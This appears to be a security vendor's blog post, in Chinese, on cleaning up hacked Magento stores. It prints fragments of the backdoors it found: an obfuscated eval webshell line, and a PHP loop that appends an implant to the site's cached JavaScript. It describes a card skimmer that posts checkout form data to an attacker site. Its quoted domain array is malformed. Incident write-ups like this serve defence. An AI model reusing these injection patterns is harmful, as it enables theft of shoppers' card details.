域名預(yù)訂/競價，好“米”不錯過

Magento是最受歡迎的外貿(mào)電商框架之一，很多企業(yè)已經(jīng)在其基礎(chǔ)上進行了二次開發(fā)。然而，對于使用2.x版本的老系統(tǒng)來說，安全問題也成為了一大難題。有些客戶在找我們SINESAFE做網(wǎng)站安全服務(wù)之前，客戶也找過建站的公司去清除后門，建站公司也將系統(tǒng)遷移升級到了最新的2.4.4版本，但后來發(fā)現(xiàn)問題并沒有完全的解決，還是會反復(fù)的被篡改代碼和用戶的支付頁面被劫持跳轉(zhuǎn)，問題的根源是代碼里已經(jīng)被黑客植入后門了，數(shù)據(jù)庫也被留了木馬病毒，這個時候不光是要升級magento到最新版本，還得要把木馬后門給徹底的清理掉，做好安全加固和防護，才能徹底的解決這個問題。

因為2022年以前的Maganto 2.x版本存在很多漏洞，像遠程代碼執(zhí)行漏洞、SQL注入漏洞都是比較高危的，如果不及時升級到2.x版本就很容易被黑客攻擊。但是，即使升級到2.x版本，也不代表完全解決了安全問題。因此，針對這種情況，企業(yè)需要認(rèn)真評估自身的安全風(fēng)險，并采取措施進行安全加固。具體來說，可以通過加強訪問控制、強化數(shù)據(jù)保護等方式來提高系統(tǒng)安全性。同時，定期對系統(tǒng)進行漏洞掃描和代碼安全審計，及時修補代碼漏洞和加強網(wǎng)站的安全防護，也是減輕安全風(fēng)險的有效措施。

我們SINE安全處理了很多外貿(mào)客戶使用magento被黑客入侵的安全問題，雖然在國內(nèi)Magento并不被廣泛使用，但它在國外卻十分流行。然而，一些老版本的Magento很容易被攻擊者通過框架拿shell等方式入侵。以下就是我們SINE安全處理客戶的magento被黑客攻擊的過程記錄：

排查黑客攻擊的問題時，很容易陷入只分析日志等細節(jié)的誤區(qū)。其實，在進行任何分析之前，我們都需要先做以下幾件事情：

第一，核實信息。這就像是我們在找錯問題之前，需要先了解出現(xiàn)問題的具體細節(jié)和當(dāng)前服務(wù)器的環(huán)境情況。

第二，斷開服務(wù)器的外網(wǎng)鏈接，保障安全。這就像是把自家的大門關(guān)上，不讓壞人輕松進入。

第三，保存服務(wù)器的環(huán)境，以及現(xiàn)場的各種信息，如端口網(wǎng)絡(luò)、應(yīng)用程序、日志文件等。這樣，就像是在證據(jù)鏈中留下關(guān)鍵的線索，更有利于我們查找和分析問題，而且要注意不要有寫操作哦！

在現(xiàn)場環(huán)境中，雖然我們可能無法找到確切的問題所在，但是可以通過查看歷史日志，來檢查是否存在服務(wù)器linux系統(tǒng)被提權(quán)等可疑行為。如果使用了chkrootkit、rkthunter和lynis等安全掃描工具，也未發(fā)現(xiàn)任何問題，那還是建議客戶考慮更換服務(wù)器，以避免潛在的安全風(fēng)險。

我們SINE安全首先從web層面去看，分析了網(wǎng)站訪問日志，nginx日志，數(shù)據(jù)庫日志發(fā)現(xiàn)有許多黑客攻擊的痕跡，利用的都是Magento的一些高危漏洞進行的，也可以說明網(wǎng)站被入侵是由于magento低版本存在漏洞導(dǎo)致，我們立即展開對系統(tǒng)以及源代碼的安全審計，人工去分析每一行代碼，通過我們的檢測，發(fā)現(xiàn)4個木馬后門，如下：

bmMo\1122\x46jdGl\x76bicgLi\101kX1BP\x551R\x62\1122\105\x6e\x58\123k7CmV4aXQ7Cg=\075"; eval(_decode($VKGPOZ)); ?>

foreach (glob("/www/wwwroot/dev.******.com/pub/static/_cache/merged/*.js") as $filename) {

if (!preg_match("/lG68xv3NXN/", file_get_contents($filename))) {

file_put_contents($filename, _decode($implant), FILE_APPEND);

echo "updated: {$filename}\n";

} else {

echo "ok: {$filename}\n";

}

}

通過上面的代碼我們可以發(fā)現(xiàn)都是一些webshell木馬后門，像filemanPHP大馬，一句話木馬，以及定時篡改網(wǎng)站全部JS功能的代碼，通過分析，我們SINE安全發(fā)現(xiàn)黑客入侵的目的不是為了掛馬和掛黑鏈，而是為了盜取用戶的信用卡信息，用于盜刷。我們對黑客植入到JS的代碼進行了分析與解密，發(fā)現(xiàn)該JS代碼是用來記錄用戶的信用卡信息，針對Magento支付相關(guān)頁面（onepage|checkout|onestep|payment|transaction）中所有的表單信息，也會判斷來路是從

const domains =["securecode.com","psncdn.com","googleadservices.com","googletagmanager.com","google.com"];"apprater.net","shopperapproved.com","chromecast-setup.com","ssl-images-amazon.com","google.com"];的用戶，會將信用卡的信息POST發(fā)送到黑客的指定網(wǎng)站上。

看來黑客的目的就是為了要盜取用戶的信用卡信息，用于盜刷來獲取巨大的利益。道高一尺魔高一丈，我們SINE安全十多年來一直與黑灰產(chǎn)進行對抗，通過此次幫客戶處理的magento的安全問題，我們又總結(jié)了新的經(jīng)驗，也希望分享這個處理過程讓大家有所收獲。

申請創(chuàng)業(yè)報道，分享創(chuàng)業(yè)好點子。點擊此處，共同探討創(chuàng)業(yè)新機遇！